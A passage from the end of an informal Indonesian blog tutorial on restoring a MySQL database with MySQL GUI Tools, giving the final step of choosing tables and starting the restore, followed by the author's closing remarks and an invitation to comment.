4. Bila anda telah menentukan table tertentu atau keseluruhan yang akan  di restore, kemudian barulah anda dapat memulai start restore.
   

Sekian tulisan sederhana dari saya mengenai restore database MySQL dengan menggunakan MySQL GUI Tools, kalo ada yang ingin ditanyakan silahkan mengisi komen dari postingan ini, insyaallah sebisa mungkin akan dijawab oleh yang ahli di bidangnya, saya mah baru belajar 1 jam yang lalu.

kurang lebihnya mohon maaf  jika ada salah-salah kata. Semoga bermanfaat

save